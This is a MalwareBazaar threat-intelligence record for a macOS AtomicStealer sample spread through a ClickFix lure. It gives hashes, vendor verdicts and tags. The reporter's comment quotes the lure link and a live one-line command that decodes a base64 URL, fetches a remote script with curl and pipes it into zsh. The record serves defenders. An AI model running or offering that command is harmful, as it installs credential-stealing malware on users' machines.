MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8e9dd132e044d2d44ef09c4bcce1ab64f089100a7c6414c9b8d0c95c57cabcd0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 7



SHA256 hash: 8e9dd132e044d2d44ef09c4bcce1ab64f089100a7c6414c9b8d0c95c57cabcd0
SHA3-384 hash: fff4810bed41498822f8c9fdd1daaf2d61f33d7a5994db367069f222b13fa9e81150638d425bd1ca854face34f57d3ad
SHA1 hash: 852b332a456ca81da9a03a9ef7046370d6759e8a
MD5 hash: 083ccc0d4fe17c01a58098d5d402bdd6
humanhash: gee-minnesota-oranges-aspen
File name: update
Download: download sample
File size: 4'186'528 bytes
First seen: 2026-05-24 07:17:34 UTC
Last seen: Never
File type: php macho
MIME type: application/x-mach-binary
ssdeep 98304:6v+Lxv0F8YBEbAbkdx6bbRxX9QZRvv74vQLxv0F8YBEbAbkdVqHbRZX9wZRvvT:Y+LxnY+bAgduR2Rb6QLxnY+bAgdOR+Rz
TLSH T11A1623E8E0BF27D7E9631EFE8A59A6B4E40D21359D1C6032E13DC3B6AC920455E78D13
TrID 82.2% (.DYLIB) Mac OS X Mach-O universal Dynamically linked shared Library (32500/1/5)
17.7% (.O/DYLIB/BUNDLE) Mac OS X Universal Binary (generic) (7002/2)
Magika macho
Reporter b0gdanw
Tags: ClickFix machO macOS OSX


b0gdanw
The payload from ClickFix "Download for macOS — DMG or via bash" https://flylnk.xyz/?go=3vyu3ncq
curl -s $(echo "aHR0cHM6Ly9vcmJpdHN0cmlkZTcuY29tL2N1cmwvZWU0NTZhZGExOWE2MGE3NGFlMTkwMTBmMGQ0NjA3NWU2MzA2MjM1ZGY4Yjg1Y2JjMWZhMDZiMTk4MTA3NzkyNg==" | openssl base64 -d -A) | zsh

Intelligence


File Origin
# of uploads: 1
# of downloads: 242
Origin country: US
Vendor Threat Intelligence
No detections
Verdict: Malicious
File Type: macho fat
First seen: 2026-05-25T13:51:00Z UTC
Last seen: 2026-05-26T01:30:00Z UTC
Hits: ~10
Score: 99%
Verdict: Malware
File Type: Mach-O universal binary
Threat name: MacOS.Trojan.Multiverze
Status: Malicious
First seen: 2026-05-24 07:19:19 UTC
File Type: Binary (Archive)
Extracted files: 2
AV detection: 12 of 38 (31.58%)
Threat level: 5/5
Malware family: AtomicStealer
Verdict: Malicious
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

  
Delivery method: Other
